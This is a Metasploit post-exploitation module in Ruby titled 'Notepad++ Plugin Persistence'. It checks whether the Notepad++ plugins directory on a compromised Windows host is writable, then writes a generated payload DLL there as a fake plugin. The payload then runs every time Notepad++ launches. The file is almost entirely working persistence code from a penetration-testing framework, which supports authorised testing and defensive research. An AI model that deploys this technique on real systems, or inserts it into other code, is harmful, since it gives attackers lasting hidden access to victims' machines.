1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::File
10
  include Msf::Exploit::EXE
11
  include Msf::Exploit::Local::Persistence
12
  prepend Msf::Exploit::Remote::AutoCheck
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Notepad++ Plugin Persistence',
19
        'Description' => %q{
20
          This module create persistence by adding a malicious plugin to Notepad++, as it blindly loads and executes DLL from its plugin directory on startup, meaning that the payload will be executed every time Notepad++ is launched.
21
        },
22
        'License' => MSF_LICENSE,
23
        'Author' => [ 'msutovsky-r7' ],
24
        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
25
        'Platform' => [ 'win' ],
26
        'SessionTypes' => [ 'meterpreter', 'shell' ],
27
        'Targets' => [
28
          [ 'Automatic', {} ]
29
        ],
30
        'DisclosureDate' => '2005-12-11', # plugins were added to Notepad++
31
        'DefaultTarget' => 0,
32
        'References' => [
33
          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
34
          ['URL', 'https://www.cybereason.com/blog/threat-analysis-report-abusing-notepad-plugins-for-evasion-and-persistence']
35
        ],
36
        'Notes' => {
37
          'Stability' => [CRASH_SAFE],
38
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
39
          'SideEffects' => [ARTIFACTS_ON_DISK]
40
        }
41
      )
42
    )
43

44
    register_options(
45
      [
46
        OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
47
      ]
48
    )
49
  end
50

51
  def get_plugin_dir
52
    expand_path('%PROGRAMFILES%\\Notepad++\\plugins\\')
53
  end
54

55
  def check
56
    @plugin_dir = get_plugin_dir
57
    return CheckCode::Safe('Notepad++ is probably not present') unless directory?(@plugin_dir)
58

59
    # borrowed from startup folder persistence
60
    begin
61
      # windows only ps payloads have writable? so try that first
62
      return CheckCode::Safe("Unable to write to #{@plugin_dir}") unless writable?(@plugin_dir)
63
    rescue RuntimeError
64
      filename = @plugin_dir + '\\' + Rex::Text.rand_text_alpha((rand(6..13)))
65
      write_file(filename, '')
66
      if exists? filename
67
        rm_f(filename)
68
      else
69
        return CheckCode::Safe("Unable to write to #{@plugin_dir}")
70
      end
71
    end
72

73
    CheckCode::Vulnerable('Notepad++ present and plugin folder is writable')
74
  end
75

76
  def install_persistence
77
    @plugin_dir ||= get_plugin_dir
78

79
    payload_name = CGI.escape(datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13))))
80
    payload_pathname = @plugin_dir + payload_name + '\\'
81
    payload_exe = generate_payload_dll({ dll_exitprocess: true })
82
    fail_with(Failure::BadConfig, "#{payload_instance.arch.first} payload selected for #{sysinfo['Architecture']} system") unless sysinfo['Architecture'] == payload_instance.arch.first
83
    vprint_good("Writing payload to #{payload_pathname}")
84
    if session.type == 'meterpreter'
85
      fail_with(Failure::UnexpectedReply, 'Error while creating malicious plugin directory') unless session.fs.dir.mkdir(payload_pathname)
86
    else
87
      fail_with(Failure::UnexpectedReply, 'Error while creating malicious plugin directory') unless cmd_exec("mkdir \"#{payload_pathname}\"")
88
    end
89

90
    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname + payload_name + '.dll', payload_exe)
91

92
    vprint_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_pathname}")
93
    @clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '/')}\"\n"
94
  end
95
end
96

97